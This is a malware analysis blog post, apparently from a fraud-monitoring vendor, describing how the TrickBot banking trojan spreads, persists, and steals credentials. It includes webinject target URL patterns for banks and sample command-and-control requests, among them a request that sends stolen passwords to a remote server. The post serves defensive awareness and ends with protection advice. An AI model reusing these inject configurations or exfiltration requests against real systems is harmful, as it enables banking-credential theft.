TrickBot, a banking trojan that has been infecting victims since 2016, is considered by many cybersecurity experts to be one of the top threats targeting businesses. So far, TrickBot has compromised over 250 million email accounts.
TrickBot usually propagates via spear phishing emails; typically, using weaponized Microsoft Word or Excel attachments, pretending to be invoices or resumés. It also spreads by being downloaded by other banking trojans such as IcedID and Emotet as a secondary payload.
Once installed on the victim’s network, it quickly spreads throughout an enterprise infrastructure by exploiting vulnerabilities in the server message block (SMB) protocol. It creates persistence on an infected system by using Window’s Scheduled Task.
TrickBot has a meticulously composed target list (see below). Originally, TrickBot focused on North America and Europe, but then expanded its target list to include banks in Australia and Asia. It now targets banks all around the world. In fact, its target list is about ten to twenty times as long as other banking trojans.
The primary targets of TrickBot are located in USA, for example USAA (United Services Automobile Association an insurance and financial services provider located in Texas, U.S.A.):
[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<dinj> // Dynamic INJection
// URL fragment (if open in browser, Bot will try to steal credentials)
// Where it is going to post logins/etc stolen[/vc_message]It also targets “major” companies like Amazon:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<dinj>
<lm>https://sellercentral.amazon.com/payments/reports/statement/details*</lm>[/vc_message]Or PayPal:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<lm>https://www.paypal.com/mep/dashboard*</lm>[/vc_message]Trickbot also extends its interest to European companies:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<lm>*securebank.santander*.de/EBANDE*/BtoChannelDriver*</lm>
<lm>https://secure.halifax-online.co.uk/personal/a/logon/entermemorableinformation.jsp*</lm>[/vc_message]The list of “targets” is not static. From time to time, TrickBot probes new regions. For instance, around 15th August 2018 it started to target Australian banks:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<mm>https://banking.westpac.com.au*</mm> <sm>https://banking.westpac.com.au/wbc/banking/handler*</sm>
<mm>https://inetbnkp.adelaidebank.com.au*</mm>[/vc_message]While TrickBot is still targeting a few Australian banks (a recent case was seen on 12th December 2019 for Commonwealth Bank of Australia):[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<lm>https://*.my.commbank.com.au/netbank/PaymentHub/MakePayment.aspx*sn-transfers-bpay</lm>
<hl>http://18.104.22.168:2020/q1MPVi7phg/getinj/hYduOVpZwD</hl>[/vc_message]TrickBot dropped most of the Australian banks from its target list. This could be due to an increase in probes in Japan (from approximately 22th October 2019 – present):[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<lm>https://ib.resonabank.co.jp/IB/Js/template.js</lm>
…[/vc_message]TrickBot uses a wide spectrum of modules to steal all kinds of credentials, including network passwords.
Some of the modules and methods TrickBot employs are:
- A dynamic webinject it uses against financial institutions (injectDll32/injectDll64).
- Collecting system information of infected device such as CPU, OS, and memory information; user accounts; and lists of installed programs and services and sending these to the C&C server (systeminfo32/systeminfo64).
- Gathering network information of the infected system and sending it to C&C server (networkDll32/networkDll64).
- A “password grabber” module which steals credentials from applications like Filezilla, Microsoft Outlook and WinSCP (pwgrab32/pwgrab64).
- Targeting point-of-sale (PoS) systems (psfin32/psfin64).
- Stealing browser data such as cookies, browsing history, browser configuration (importDll32/importDll64).
- Stealing additional credentials to move lateral and further exploit the infected system (tabDll32/tabDll64).
- A module that searches through the files of an infected machine to collect email address to spread to via new spam massages (mailsearcher32/mailsearcher64).
- A worm module, allowing TrickBot to move laterally within an infected network via EternalBlue (MS17-010), Eternal Romance and EternalChampion exploits (mwormDll32/mwormDll64).
- For lateral movement, downloading a TrickBot loader from a URL, propagating the loader to network shares connected to the affected machine, and installing the loader as a service for persistence (mshareDll32/mshareDll64).
As shown above, TrickBot does not just simply inject into browser sessions and listen to traffic; it actually starts its malicious activities by scanning the computer (mail agents, browser data…). This means that even if a user of an infected system has not visited any of the “target websites”, valuable information has probably been sent to the C&C server.
FraudWatch International recommends the following steps be taken by businesses to protect against being infected by the TrickBot trojan:
- Train: Every employee should be trained on recognizing phishing and spear-phishing, as this is the primary infection vector not only for TrickBot, but also for many other malware programs.
- Update: Ensure that all devices and software applications, especially antivirus and antimalware programs, are up-to-date and patched.
- Monitor: Use filters to identify malicious emails and monitor the network for suspicious traffic or attempts to communicate with blacklisted IPS.
- Access: Disable macros, prohibit external application downloads and prevent non-whitelisted URLs from being accessed.
Appendix 1. Some specifics of TrickBot’s behaviour
Once TrickBot’s module gets control, it installs itself into the system. For example, in order to be persistent, it creates new Windows Task.[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]Location (example): “C:WindowsSystem32TasksCommand cache application” // E.g. it tries to look like “typical” Windows application.[/vc_message]Task content:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<Task version=”1.2″ xmlns=”http://schemas.microsoft.com/windows/2004/02/mit/task”>
[/vc_message]TrickBot slightly changes its original name, for example “radia.exe” to “tadia.exe”.
It waits several minutes prior to the first connection to its server (which is not long compared to other trojans) and sends requests to its command and control server (C&C). For example:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]GET https://22.214.171.124:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/spk/ HTTP/1.1
Server -> HTTP/1.1 200 OK
Server -> Server: nginx/1.10.3
Server -> …<Encrypted Response>[/vc_message]In the above example, “mor51” is the Tag (or current “campaign name”), e.g. its C&C server sees which generation of bot obtained control.
More examples of “tags”:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]- “mor63”, “mor58”, “mor43”, … “tot597” (around 29.10.2019), “mango21″, …
<Encrypted Response> – if decrypted (SHA 256 bits + AES 256 bits) would be like:
</ssert>[/vc_message]Next, TrickBot sends information about the infected system. For example:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]GET https://126.96.36.199:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/0/Windows%207%20×86%20SP1/1079/<Infected Machine’s IP address>/893F0845BDAE1F2BD91BCFAE506A3A947D99A541A49436A6B4D0DB1FC4F0A801/…[/vc_message]Then sends a request for modules. Typically, the first module is a password-stealer:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]https://188.8.131.52:447/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/5/pwgrab32/[/vc_message]The server responds with (encrypted) “pwgrab32” module. This module is not specific, it will “grab” all possible passwords from infected machine and send them to C&C:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]POST https://184.108.40.206:449/mor51/<MachineName>_W617601.173A7097DBB9D6B1EC76B8F1ADC3958C/64/pwgrab/DEBG/browser/ HTTP/1.1[/vc_message]The Chrome webdata db file is copied.[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]importDll32
tabDll32[/vc_message]As you can see, TrickBot has a full array of “functions” to steal information and exploit systems, including Shared drives, etc.
Finally, TrickBot will download its WEB Injector module (“injectDll32″) and configuration files:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<DIR> injectDll32_configs
<DIR> pwgrab32_configs[/vc_message]”injectDll32_configs” contains settings which are descriptors for its targets. Most targets are banks (approximately 100 different banks from many countries). The most recent update of the target list was made around 22th October 2019, and there now seems to be a focus on Japanese banks:[vc_message message_box_color=”grey” icon_fontawesome=”fa fa-code”]<dinj>
</dinj>[/vc_message]At FraudWatch International, we monitor activity for numerous trojans, including TrickBot, and we detect the latest changes and new targets. As part of our Anti-Malware service, we can take down the IPs responsible, therefore disabling TrickBot’s ability to send harvested credentials back to criminals.
Taking down C&C IPs works even if the trojans remain undetected on infected machines. Due to our constant monitoring services, we detect the latest changes (IPs and targets), as soon as the criminals start to push out their new campaigns.
If you think Anti-Malware services could assist your business, don’t hesitate to contact us.